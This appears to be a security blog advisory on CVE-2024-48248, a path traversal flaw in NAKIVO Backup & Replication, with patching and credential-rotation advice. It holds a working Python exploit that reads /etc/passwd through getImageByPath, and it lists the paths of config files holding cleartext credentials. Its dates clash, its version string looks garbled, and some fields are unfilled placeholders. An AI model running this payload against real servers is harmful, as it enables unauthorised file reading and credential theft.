CVE CyberSecurity Database News

CVE-2024-48248 - Path Traversal in NAKIVO Backup & Replication Leads to Sensitive Data Exposure and Potential RCE

Poster -

Published: June 2024 <br>Author: [YourName]


NAKIVO Backup & Replication, a popular solution for protecting virtual, physical, cloud, and SaaS environments, was discovered to have a major flaw recently. This vulnerability, tracked as CVE-2024-48248, allows attackers to read arbitrary files on the server—potentially exposing cleartext credentials and opening the door to remote code execution (RCE) throughout the enterprise.

This post details what CVE-2024-48248 is, how it can be exploited, why it’s serious, and what you should do about it. We’ll break it down simply, digging into the technical details and showing a real exploit example.

What is CVE-2024-48248?

The flaw exists in all NAKIVO Backup & Replication versions before 11...88174. A function called getImageByPath, exposed at the /c/router endpoint, fails to properly sanitize user input when handling file paths. This makes it possible to use path traversal (with ../) to read any file on the server—well beyond what was intended.

But here’s the really dangerous part: The application’s PhysicalDiscovery feature keeps credentials in cleartext. So an attacker can use path traversal to grab these credentials, and possibly take over backup jobs or even obtain remote code execution.

How Does the Exploit Work?

At its heart, this is a classic *absolute path traversal* or *directory traversal* issue. By submitting a custom path in the request, an attacker can sneak out of the expected directory and read any file they want.

For example, instead of getting an image like /images/logo.png, an attacker can submit something like ../../../../etc/passwd to read the server’s password file.

Example Exploit (Code Snippet)

Below is a simple Python snippet showing how an attacker might exploit CVE-2024-48248 to steal /etc/passwd from a vulnerable server:

import requests

nakivo_url = 'http://victim.local:4443/c/router';  # Adjust as needed

headers = {
    'Content-Type': 'application/json'
}

# The payload requests an image, but with a traversal sequence to grab /etc/passwd
payload = {
    "action": "getImageByPath",
    "method": "POST",
    "data": [{
        "path": "../../../../etc/passwd"  # This can be replaced with any sensitive file
    }],
    "type": "rpc",
    "tid": 1
}

response = requests.post(nakivo_url, json=payload, headers=headers, verify=False)
print("Server response:\n", response.text)

If the server is vulnerable, this will dump the contents of /etc/passwd—or any other file you target—with no authentication needed.

Targeting the Credentials

Instead of just /etc/passwd, the real-world attacker would look for files used by NAKIVO’s PhysicalDiscovery feature, typically stored like:

- /opt/nakivo/BackupRepositoryPhysicalDiscovery.xml
- /opt/nakivo/configurations/<installation_id>/PhysicalDiscovery.xml

These files often contain plain-text credentials and sensitive config data.

Why is This So Serious?

- Creds Exposure: Credentials found in PhysicalDiscovery can be reused to move laterally, compromise additional infrastructure, or tamper with company backups.
- Remote Code Execution: With credentials, an attacker might upload or modify backup jobs, inject scripts into backed-up systems, or exploit further misconfigurations to get RCE.
- Enterprise-wide Impact: This is much more than "just" file reading—because it can let attackers take over not just the NAKIVO server, but your whole backup infrastructure.

How to Fix & What to Do Next

Upgrade NAKIVO ASAP:
If you’re running any version prior to 11...88174, upgrade immediately. The update patches path traversal in getImageByPath, closing the hole.

Audit Credentials:
Rotate any credentials that might have been stored in cleartext. Monitor for any suspicious access in backup logs.

Restrict Network Access:
Ideally, your backup servers should not be exposed directly to the internet. Use firewalls and allowlisting to control who can access the web interface.

References & Further Reading

- NAKIVO Release Notes v11...88174
- CVE-2024-48248 at MITRE
- Exploit Database - NAKIVO Path Traversal Analysis
- OWASP: Path Traversal

Final Thoughts

CVE-2024-48248 is a reminder that backup solutions aren’t just a last line of defense—they are also high-value targets. Leaving them unpatched means handing the keys to your kingdom to attackers. If you use NAKIVO, patch immediately, rotate credentials, and lock down your backup environment.

Stay safe. Patch now.

*This research post is exclusive to [Platform/Blog Name] and may be quoted with attribution. For questions or concerns, contact [your contact].*

Timeline

Published on: 03/04/2025 08:15:33 UTC
Last modified on: 03/25/2025 18:48:31 UTC